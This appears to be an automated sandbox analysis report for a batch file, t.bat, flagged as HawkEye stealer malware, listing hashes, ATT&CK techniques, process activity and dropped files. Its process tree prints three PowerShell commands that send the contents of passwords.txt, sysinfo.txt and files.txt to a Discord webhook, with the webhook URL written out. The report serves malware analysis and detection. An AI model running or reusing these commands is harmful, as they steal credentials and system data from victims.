hawkeye | 3a138a295230f132721473e396032bdd250158b6a1e45323cc520f5fe7985978

General

Target

t.bat
Size

864B
MD5

6c5db6669363fe77494ada18a6e5f2fa
SHA1

2d6bf0e0ec048cf0e52ffc745ef4eb7c3d6f1860
SHA256

3a138a295230f132721473e396032bdd250158b6a1e45323cc520f5fe7985978
SHA512

b78bbae047151081025c9051d79cd18cf4adc45c1566a828c4c2236b0d98c702714f7c81f7d5bcba8745015e58540eaa6b91610c9a5879c7a9e973f88eef0bed

Score

10^/10

hawkeye keylogger spyware stealer trojan

Malware Config

Signatures

HawkEye
HawkEye is a malware kit that has seen continuous development since at least 2013.
keylogger trojan stealer spyware hawkeye

Blocklisted process makes network request 3 IoCs

flow	pid	Process
6	1040	powershell.exe
26	3948	powershell.exe
34	3916	powershell.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3736	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1040	powershell.exe
1040	powershell.exe
3948	powershell.exe
3948	powershell.exe
3916	powershell.exe
3916	powershell.exe
3916	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	1040	powershell.exe
Token: SeDebugPrivilege	3948	powershell.exe
Token: SeDebugPrivilege	3916	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3308 wrote to memory of 1040	3308	cmd.exe	86
PID 3308 wrote to memory of 1040	3308	cmd.exe	86
PID 3308 wrote to memory of 3736	3308	cmd.exe	92
PID 3308 wrote to memory of 3736	3308	cmd.exe	92
PID 3308 wrote to memory of 3948	3308	cmd.exe	96
PID 3308 wrote to memory of 3948	3308	cmd.exe	96
PID 3308 wrote to memory of 3916	3308	cmd.exe	100
PID 3308 wrote to memory of 3916	3308	cmd.exe	100

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\t.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content passwords.txt)}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1040
- C:\Windows\system32\systeminfo.exe
  systeminfo
  2⤵
  - Gathers system information
  PID:3736
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content sysinfo.txt)}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/1173685735228985494/03JreB4JsfBMfEb-HRffc4smZ19x0KflJwBN4LO5qPB73n0cAHJbBYg6O6IWmkmLS08_' -Method POST -Body @{content=(Get-Content files.txt)}"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3916

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

1

T1552

Credentials In Files

1

T1552.001

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Data from Local System

1

T1005

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8a7f1bbb54d46317b10f8570930f1587

SHA1
a3622cd5ba47ff63381e1c8459dcdb822ae80b14

SHA256
19409fcc9d229fdc1fa59eb1b3beea2e031a76782261e3fdd0af6639f7111cac

SHA512
9c8c56c205ed32589c9ce80f10fe11986f238a722b3016e50e7677d60f190c7abe2fe445a9bdf2d192d8a9ab4f2e29528d5e179b2dca0c83668c3932858488c4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3d2dcde2b92ddc1caedbe3dcc9efc114

SHA1
e149ab0853f59539a6993d1727e7f29834c3a548

SHA256
3c598ecbf86eb6c3f992e35bbcd69e354cfb1f9caf0c436cd7acabac111d96c6

SHA512
662fd6ec00495373f8fbe821badaacf0c35e27243fd2d640e908ef913a0725f92f2379fc34d42653930463425cd8a290c8981cb658e155f10bc928ce84201ba4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
87addc59846b16b4a3c182e16ace9b84

SHA1
572ba04171b1f9d893f43f8c72800393b133161a

SHA256
abcdce53e9e05fd1009fa1a97af43f4471b3a408af5e51a1e5baa091a36ae5f0

SHA512
b5f2214bf9fe99cb9a6eda901b102bb46c9843a398d72154ff6943cec2d53defa9e7026002f80c29ea1ad0de5864aae91e8cb2b9a0426842d0d6299b87d2f18e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ejj2rgeb.ncq.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\files.txt

Filesize
187B

MD5
f31c3f34c03c7016c72b9355e02bceeb

SHA1
79ecb50628fef47b8b4518e624de4b241011da32

SHA256
ab9afd4963e85b01ab48cd37e7ebec4c3e496640a72976e5ec5529f5b92b1f8d

SHA512
abf53be628382272dbb0e75085e36ac1cc0d8c215ac4a27b2d1fe1e8647df03feaa60486a3068eae0d54c1d61256293536f59f335fe4ed55ce479aa5d9ddd679

Download Submit
C:\Users\Admin\AppData\Local\Temp\passwords.txt

Filesize
164B

MD5
53b0ead48140091a196fafb6b8c5bb3c

SHA1
c6862512054f2de22087bfe539b9fa18e97db214

SHA256
57a3befee8f64369c40dfe1fb0b6df5792c8b68381e60d786b7432fb2a3cf662

SHA512
4f8e6514ea92ab08d950d2a00448f5f08f46d48112c632e0fcc504f7ea232b08f49db505751d949064df13a20a50e149034b78a17f45cd308fec1e472f7301cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\sysinfo.txt

Filesize
2KB

MD5
a9812d5ea5001324a17895f4ec2bb47c

SHA1
054e0b9eedcb1264ace23dbf239818244fdafb4f

SHA256
8907893d54ea7f5fea57bbca52fdde5d14b6517a0b8e745d78758667b469ae5e

SHA512
2677628779d1766bb84a736034cf8bbf0bd464adcadf41d1e94b5abfa0174aa7eb3a50d8a93748f7b55378df6ed13fed0cb2ea50d69736faeb146faf6f74c559

Download Submit
memory/1040-19-0x000002D341360000-0x000002D341370000-memory.dmp

Filesize
64KB

Download
memory/1040-18-0x000002D341360000-0x000002D341370000-memory.dmp

Filesize
64KB

Download
memory/1040-21-0x000002D35A740000-0x000002D35AEE6000-memory.dmp

Filesize
7.6MB

Download
memory/1040-11-0x000002D359AE0000-0x000002D359B02000-memory.dmp

Filesize
136KB

Download
memory/1040-16-0x00007FF86B010000-0x00007FF86BAD1000-memory.dmp

Filesize
10.8MB

Download
memory/1040-17-0x000002D341360000-0x000002D341370000-memory.dmp

Filesize
64KB

Download
memory/1040-25-0x00007FF86B010000-0x00007FF86BAD1000-memory.dmp

Filesize
10.8MB

Download
memory/3916-57-0x0000025177D90000-0x0000025177DA0000-memory.dmp

Filesize
64KB

Download
memory/3916-55-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp

Filesize
10.8MB

Download
memory/3916-56-0x0000025177D90000-0x0000025177DA0000-memory.dmp

Filesize
64KB

Download
memory/3916-62-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp

Filesize
10.8MB

Download
memory/3948-44-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp

Filesize
10.8MB

Download
memory/3948-39-0x00000267E8AF0000-0x00000267E8B00000-memory.dmp

Filesize
64KB

Download
memory/3948-40-0x00000267E8AF0000-0x00000267E8B00000-memory.dmp

Filesize
64KB

Download
memory/3948-38-0x00007FF86ACC0000-0x00007FF86B781000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing